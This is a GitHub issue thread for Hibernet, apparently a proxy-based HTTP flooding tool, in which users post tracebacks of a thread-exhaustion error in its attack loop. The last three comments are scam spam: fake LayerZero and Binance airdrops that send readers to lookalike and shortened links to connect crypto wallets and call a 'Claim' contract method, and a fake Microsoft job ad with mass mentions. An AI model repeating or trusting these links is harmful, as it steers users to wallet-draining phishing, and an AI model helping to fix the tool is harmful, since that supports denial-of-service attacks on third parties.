### ISSUE TITLE
Error

### ISSUE THREAD

**Issue by lilcsz** [All3xJ/Hibernet#24]
File "HibernetV3.0.py", line 505, in starturl
    proxymode()
  File "HibernetV3.0.py", line 512, in proxymode
    choiceproxysocks()
  File "HibernetV3.0.py", line 520, in choiceproxysocks
    choicedownproxy()
  File "HibernetV3.0.py", line 531, in choicedownproxy
    proxyget(urlproxy)
  File "HibernetV3.0.py", line 566, in proxyget
    proxylist() # se va tutto liscio allora prosegue eseguendo la funzione proxylist()
  File "HibernetV3.0.py", line 574, in proxylist
    numthreads()
  File "HibernetV3.0.py", line 583, in numthreads
    multiplication()
  File "HibernetV3.0.py", line 592, in multiplication
    begin()

**Comment by All3xJ** [comment]
> File "HibernetV3.0.py", line 505, in starturl
> proxymode()
> File "HibernetV3.0.py", line 512, in proxymode
> choiceproxysocks()
> File "HibernetV3.0.py", line 520, in choiceproxysocks
> choicedownproxy()
> File "HibernetV3.0.py", line 531, in choicedownproxy
> proxyget(urlproxy)
> File "HibernetV3.0.py", line 566, in proxyget
> proxylist() # se va tutto liscio allora prosegue eseguendo la funzione proxylist()
> File "HibernetV3.0.py", line 574, in proxylist
> numthreads()
> File "HibernetV3.0.py", line 583, in numthreads
> multiplication()
> File "HibernetV3.0.py", line 592, in multiplication
> begin()

please provide more info

**Comment by Arjun-Santokhi1** [comment]
Traceback (most recent call last):
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 769, in <module>
    starturl() # questo fa startare la prima funzione del programma, che a sua volta ne starta un altra, poi un altra, fino ad arrivare al
l'attacco.
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 505, in starturl
    proxymode()
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 512, in proxymode
    choiceproxysocks()
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 520, in choiceproxysocks
    choicedownproxy()
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 531, in choicedownproxy
    proxyget(urlproxy)
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 566, in proxyget
    proxylist() # se va tutto liscio allora prosegue eseguendo la funzione proxylist()
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 574, in proxylist
    numthreads()
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 583, in numthreads
    multiplication()
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 592, in multiplication
    begin()
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 597, in begin
    loop()
  File "/root/hiber/Hibernet/./HibernetV3.0.py", line 635, in loop
    RequestProxyHTTP(x+1).start() # starta la classe apposita
  File "/usr/lib/python3.9/threading.py", line 892, in start
    _start_new_thread(self._bootstrap, ())
RuntimeError: can't start new thread

please help

thx

**Comment by LuukieLucas** [comment]
yes i got the same error

**Comment by vokaplok** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by atfalstyle** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://bit.ly/48M0kd2)

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](http://bit.ly/48M0kd2) link.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in ETH!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with Binance!


Winners: @taerbao, @wilcollins, @ZhaoyangYangHub, @hubciorz, @adamaucamp, @devonzuegel, @liutaihua

**Comment by StephaneMobiArchitects** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Join us and be part of a team dedicated to driving innovation and success!

## How to Apply:
To apply for this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.elmeriniemela, @curtainteddy, @DRosadoYew, @mapaiva, @jmsundin, @r0bM01, @glitteryskye99, @xtwist, @niten2, @land-pack, @Kainekonn, @imafuckinstar, @saltire, @RockHoward, @dullage, @2trvl, @YoritaP, @jonar06, @szhatchenko, @JojoChen27
